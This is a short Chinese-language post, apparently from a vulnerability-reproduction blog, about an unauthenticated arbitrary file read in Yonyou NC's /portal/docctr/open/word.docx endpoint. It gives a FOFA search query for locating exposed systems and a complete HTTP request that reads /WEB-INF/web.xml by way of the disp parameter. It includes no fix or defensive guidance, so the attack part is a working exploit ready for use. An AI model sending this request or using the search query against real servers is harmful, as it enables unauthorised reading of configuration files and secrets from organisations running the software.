Babing
Published on 2024-08-30 / 2 Visits
0
0

Y4-54用友-NC-任意文件读取

Y4-54用友-NC-任意文件读取

漏洞描述:

用友NC 系统word.docx等接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。

网站图片:

image-20240623123820870

网络测绘:

fofa语法:

body=“UClient.dmg”

漏洞复现:

payload:

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

效果图:
读取web.xml配置文件


Comment